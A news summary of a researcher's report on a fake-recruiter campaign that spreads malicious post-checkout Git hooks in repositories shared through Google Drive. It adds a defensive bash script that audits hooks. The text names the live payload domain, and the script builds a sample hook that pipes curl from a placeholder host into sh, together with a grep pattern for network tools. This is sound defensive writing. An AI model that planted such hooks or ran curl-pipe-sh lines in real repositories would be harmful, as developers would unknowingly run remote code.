Malware Spreads Through Git Repositories Using Malicious Hooks

Original: Be careful with your Git: Investigating malware spreading through Git repositories

Why This Matters

Demonstrates an attack vector aimed at developers: a repository handed over as an archive, with its .git directory included, can carry executable hooks that run on the very first git command the recipient types.

A security researcher documents a malware campaign in which fake LinkedIn recruiters distribute infected Git repositories via Google Drive. The attackers plant a Git hook so that a malicious script executes when the developer checks out a branch.

A security researcher received a LinkedIn message from a fake recruiter who directed them to download a codebase from Google Drive. The repository appeared legitimate, but its .git directory contained malicious hooks that executed when the researcher ran git checkout. The post-checkout hook detected the operating system and downloaded a platform-specific payload from nnlabs.pro/settings for macOS, Linux, or Windows. Git's usual safeguard did not apply here: hooks live in .git/hooks and are never transferred by git clone, so a fresh clone from a remote cannot carry them, but the Google Drive download was a complete working copy, .git folder and custom hook files included, so the hooks were already in place before any git command ran. The malicious domain was hosted on Hostinger and remained active at publication time.
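The practical check this report calls for is to inspect a delivered repository's hooks before running any git command inside it. The script below is an added example, not code from the original post or from the researcher; it resolves the hooks directory without invoking git (so no hook can fire during the audit), lists the hooks Git would actually execute, and flags those that fetch from the network. The sample repository it builds is constructed for the demonstration, and the hook URL in it (example.invalid) is a placeholder, not the domain from the report.

```shell
#!/usr/bin/env bash
# Added example: audit .git/hooks of an archive-delivered repository
# before the first checkout. Uses no git commands, because git commit,
# checkout and others would already run the hooks we want to inspect.

# Resolve the hooks directory: core.hooksPath in .git/config overrides
# the default .git/hooks. Relative paths are taken from the repo root.
hooks_dir() {
    hd_repo="$1"
    hd_custom=$(sed -n 's/^[[:space:]]*hooksPath[[:space:]]*=[[:space:]]*//p' \
        "$hd_repo/.git/config" 2>/dev/null | head -n 1)
    if [ -n "$hd_custom" ]; then
        case "$hd_custom" in
            /*) printf '%s\n' "$hd_custom" ;;
            *)  printf '%s/%s\n' "$hd_repo" "$hd_custom" ;;
        esac
    else
        printf '%s/.git/hooks\n' "$hd_repo"
    fi
}

# Print the hooks Git would run: regular, executable files that are not
# the *.sample templates git init leaves behind (git ignores those and
# any hook lacking the executable bit).
list_active_hooks() {
    la_dir=$(hooks_dir "$1")
    [ -d "$la_dir" ] || return 0
    for la_f in "$la_dir"/*; do
        [ -f "$la_f" ] || continue
        case "$la_f" in *.sample) continue ;; esac
        if [ -x "$la_f" ]; then
            basename "$la_f"
        fi
    done
    return 0
}

# Among the active hooks, print those whose body reaches the network or
# pipes downloaded content into an interpreter. A hit is a reason to
# read the hook by hand before touching the repository.
suspicious_hooks() {
    sh_dir=$(hooks_dir "$1")
    list_active_hooks "$1" | while IFS= read -r sh_name; do
        if grep -Eq 'curl|wget|Invoke-WebRequest|powershell|base64 -d|/dev/tcp' \
            "$sh_dir/$sh_name"; then
            printf '%s\n' "$sh_name"
        fi
    done
    return 0
}

# Constructed sample repository: the usual template hooks plus one live
# post-checkout hook modelled on the behaviour described in the report
# (OS detection, then a per-platform download). Placeholder URL only.
make_sample_repo() {
    ms_repo=$(mktemp -d) || return 1
    mkdir -p "$ms_repo/.git/hooks"
    printf '[core]\n\trepositoryformatversion = 0\n' > "$ms_repo/.git/config"
    printf '#!/bin/sh\necho sample\n' > "$ms_repo/.git/hooks/pre-commit.sample"
    chmod +x "$ms_repo/.git/hooks/pre-commit.sample"
    cat > "$ms_repo/.git/hooks/post-checkout" <<'EOF'
#!/bin/sh
case "$(uname -s)" in
  Darwin) curl -fsSL https://example.invalid/settings/mac | sh ;;
  Linux)  curl -fsSL https://example.invalid/settings/linux | sh ;;
esac
EOF
    chmod +x "$ms_repo/.git/hooks/post-checkout"
    # A hook without the executable bit: git would ignore it, so do we.
    printf '#!/bin/sh\necho harmless\n' > "$ms_repo/.git/hooks/pre-push"
    printf '%s\n' "$ms_repo"
}

# Usage against a real download: suspicious_hooks /path/to/unpacked/repo
if [ "${1:-}" = "--demo" ]; then
    demo=$(make_sample_repo)
    echo "active hooks:";     list_active_hooks "$demo"
    echo "suspicious hooks:"; suspicious_hooks "$demo"
    rm -rf "$demo"
fi
```

Run it against the unpacked download before any git command; an executable post-checkout or post-merge hook that calls curl or wget in a repository you did not create is the pattern described above. Because hooks_dir honours core.hooksPath, a hook stashed under a custom directory configured in the shipped .git/config is found as well.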

Source

andrii.ro